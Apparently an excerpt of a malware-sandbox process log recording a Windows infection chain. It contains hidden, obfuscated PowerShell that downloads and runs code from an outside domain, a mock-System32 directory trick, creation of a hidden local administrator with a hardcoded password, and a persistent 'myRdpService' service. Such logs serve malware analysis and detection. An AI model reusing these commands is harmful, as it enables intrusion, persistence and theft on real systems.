        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFF9A.tmp" "c:\Users\user\AppData\Local\Temp\wr03xjs0\CSC787E510638EC4229B85DAEC3AD1CFCC9.TMP"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABlADIAYgA1ADQAMgBkAGQAZQA1ADIAMwAwAGQAOQA5ADEAMQAyADMAYwBmADEANwAwADUAMQAyAGIAMAAyADIANQBhAGUAOABjADMANwAzAGQANgA2AGMAOAAwADMAOABmADAAMQA2ADYANwA5ADAANQA1AGYANABkADUAMgAyADkAZgA4AGQANQBhAGMAMQBkAGYAMQBhAGYAZAAyADIAOQA4ADAANgA1ADkAMwBhADIANABhADAANwA0ADcANQBjADMAMwAwAGMAZQBkADMANQA3AGUANQBiADYAMgBjAGEAMQA0ADcAOQA0AGYAYwA5ADAAYwBmADkAYgA1AGIAMQA4ADEAMwAwAGIAYgA3ADUAZQAwADIAYwA2AGIAYQAxAGUANwA5ADMAOAAwADcAZgBiADYAYQA5ADYAOQBkAGQANQA4AGYAYQBjADgAYQA1AGYAMgBmADYAMgBhADkANAA2ADkAZABjADYAOAAxADYAMgA3AGYAMwBkADcANgBmADQAMQBmAGIAMgA1ADQAOABmADgAMQAwAGEAMgAyADkANwBlADQAMQA0AGQANgBjADkAYQBiADkANgA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABlADIAYgA1ADQAMgBkAGQAZQA1ADIAMwAwAGQAOQA5ADEAMQAyADMAYwBmADEANwAwADUAMQAyAGIAMAAyADIANQBhAGUAOABjADMANwAzAGQANgA2AGMAOAAwADMAOABmADAAMQA2ADYANwA5ADAANQA1AGYANABkADUAMgAyADkAZgA4AGQANQBhAGMAMQBkAGYAMQBhAGYAZAAyADIAOQA4ADAANgA1ADkAMwBhADIANABhADAANwA0ADcANQBjADMAMwAwAGMAZQBkADMANQA3AGUANQBiADYAMgBjAGEAMQA0ADcAOQA0AGYAYwA5ADAAYwBmADkAYgA1AGIAMQA4ADEAMwAwAGIAYgA3ADUAZQAwADIAYwA2AGIAYQAxAGUANwA5ADMAOAAwADcAZgBiADYAYQA5ADYAOQBkAGQANQA4AGYAYQBjADgAYQA1AGYAMgBmADYAMgBhADkANAA2ADkAZABjADYAOAAxADYAMgA3AGYAMwBkADcANgBmADQAMQBmAGIAMgA1ADQAOABmADgAMQAwAGEAMgAyADkANwBlADQAMQA0AGQANgBjADkAYQBiADkANgA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf"
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16777215
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.3.20269 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --mojo-platform-channel-handle=2352 --field-trial-handle=1644,i,17074868649269977898,11316506185755287373,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
        Source: unknownProcess created: C:\Windows\Temp\svczHost.exe C:\Windows\Temp\svczHost.exe cakoi10 uyt1n8ded9fb380.com
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop "myRdpService"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net start "myRdpService"
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
        Source: unknownProcess created: C:\Windows\Temp\myRdpService.exe C:\Windows\Temp\myRdpService.exe cakoi10
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABlADIAYgA1ADQAMgBkAGQAZQA1ADIAMwAwAGQAOQA5ADEAMQAyADMAYwBmADEANwAwADUAMQAyAGIAMAAyADIANQBhAGUAOABjADMANwAzAGQANgA2AGMAOAAwADMAOABmADAAMQA2ADYANwA5ADAANQA1AGYANABkADUAMgAyADkAZgA4AGQANQBhAGMAMQBkAGYAMQBhAGYAZAAyADIAOQA4ADAANgA1ADkAMwBhADIANABhADAANwA0ADcANQBjADMAMwAwAGMAZQBkADMANQA3AGUANQBiADYAMgBjAGEAMQA0ADcAOQA0AGYAYwA5ADAAYwBmADkAYgA1AGIAMQA4ADEAMwAwAGIAYgA3ADUAZQAwADIAYwA2AGIAYQAxAGUANwA5ADMAOAAwADcAZgBiADYAYQA5ADYAOQBkAGQANQA4AGYAYQBjADgAYQA1AGYAMgBmADYAMgBhADkANAA2ADkAZABjADYAOAAxADYAMgA3AGYAMwBkADcANgBmADQAMQBmAGIAMgA1ADQAOABmADgAMQAwAGEAMgAyADkANwBlADQAMQA0AGQANgBjADkAYQBiADkANgA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZ